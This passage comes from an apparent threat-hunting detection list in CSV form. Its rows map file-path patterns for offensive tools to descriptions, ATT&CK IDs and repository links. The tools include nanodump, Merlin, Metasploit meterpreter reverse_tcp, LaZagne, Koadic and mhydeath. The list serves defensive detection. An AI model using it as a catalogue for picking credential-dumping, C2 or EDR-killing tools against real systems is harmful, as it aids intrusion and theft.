malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*/malseclogon.*",".{0,1000}\/malseclogon\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*/MalStuff.cpp*",".{0,1000}\/MalStuff\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*/man_in_the_browser/*.js*",".{0,1000}\/man_in_the_browser\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/man_in_the_browser/*.rb*",".{0,1000}\/man_in_the_browser\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/manage/exec_cmd*",".{0,1000}\/manage\/exec_cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/Management/C2/*",".{0,1000}\/Management\/C2\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/manjusaka/plugins*",".{0,1000}\/manjusaka\/plugins.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*/MANSPIDER.git*",".{0,1000}\/MANSPIDER\.git.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*/manspider_*.log*",".{0,1000}\/manspider_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*/manspider_output*.txt",".{0,1000}\/manspider_output.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/manspiderDump*",".{0,1000}\/manspiderDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/Mara.git*",".{0,1000}\/Mara\.git.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","1","N/A","9","1","50","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z" "*/masky.py*",".{0,1000}\/masky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/master/GPSCoordinates/*",".{0,1000}\/master\/GPSCoordinates\/.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/master/JunctionFolder/*",".{0,1000}\/master\/JunctionFolder\/.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/master/PhantomService/*",".{0,1000}\/master\/PhantomService\/.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/maxdb-info.nse*",".{0,1000}\/maxdb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mcafee-epo-agent.nse*",".{0,1000}\/mcafee\-epo\-agent\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/membase-brute.nse*",".{0,1000}\/membase\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/membase-http-info.nse*",".{0,1000}\/membase\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/memcached-info.nse*",".{0,1000}\/memcached\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/memodipper64*",".{0,1000}\/memodipper64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/memory_exec.py*",".{0,1000}\/memory_exec\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/memorydump.py*",".{0,1000}\/memorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*/mempodipper.c*",".{0,1000}\/mempodipper\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/MemReader_BoF/*",".{0,1000}\/MemReader_BoF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "*/merlin.dll*",".{0,1000}\/merlin\.dll.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*/merlin.dll*",".{0,1000}\/merlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*/merlin.git*",".{0,1000}\/merlin\.git.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access 
Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/merlin.html*",".{0,1000}\/merlin\.html.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/merlin.py*",".{0,1000}\/merlin\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*/merlin/agent_code/*",".{0,1000}\/merlin\/agent_code\/.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*/merlin/data/modules/*",".{0,1000}\/merlin\/data\/modules\/.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/merlinAgent-*.exe*",".{0,1000}\/merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent.git*",".{0,1000}\/merlin\-agent\.git.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent/tarball/v*",".{0,1000}\/merlin\-agent\/tarball\/v.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent/v2/cli*",".{0,1000}\/merlin\-agent\/v2\/cli.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" 
"*/merlin-agent/v2/core*",".{0,1000}\/merlin\-agent\/v2\/core.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent/zipball/v*",".{0,1000}\/merlin\-agent\/zipball\/v.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent-dll.git*",".{0,1000}\/merlin\-agent\-dll\.git.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*/merlin-agent-dll/*",".{0,1000}\/merlin\-agent\-dll\/.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*/merlinAgent-Linux-x64*",".{0,1000}\/merlinAgent\-Linux\-x64.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a 
Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/met_inject.py*",".{0,1000}\/met_inject\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Metasploit*",".{0,1000}\/Metasploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/metasploit.go*",".{0,1000}\/metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/metasploit/*",".{0,1000}\/metasploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/metasploit-framework/embedded/framework*",".{0,1000}\/metasploit\-framework\/embedded\/framework.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/metasploit-info.nse*",".{0,1000}\/metasploit\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metasploit-msgrpc-brute.nse*",".{0,1000}\/metasploit\-msgrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metasploit-xmlrpc-brute.nse*",".{0,1000}\/metasploit\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metatwin.git*",".{0,1000}\/metatwin\.git.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*/meterpreter*",".{0,1000}\/meterpreter.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/meterpreter/reverse_tcp*",".{0,1000}\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/MFASweep.git*",".{0,1000}\/MFASweep\.git.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1192","164","2024-01-31T22:52:58Z","2020-09-22T16:25:03Z" "*/mhydeath.git*",".{0,1000}\/mhydeath\.git.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/mhydeath.sln*",".{0,1000}\/mhydeath\.sln.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense 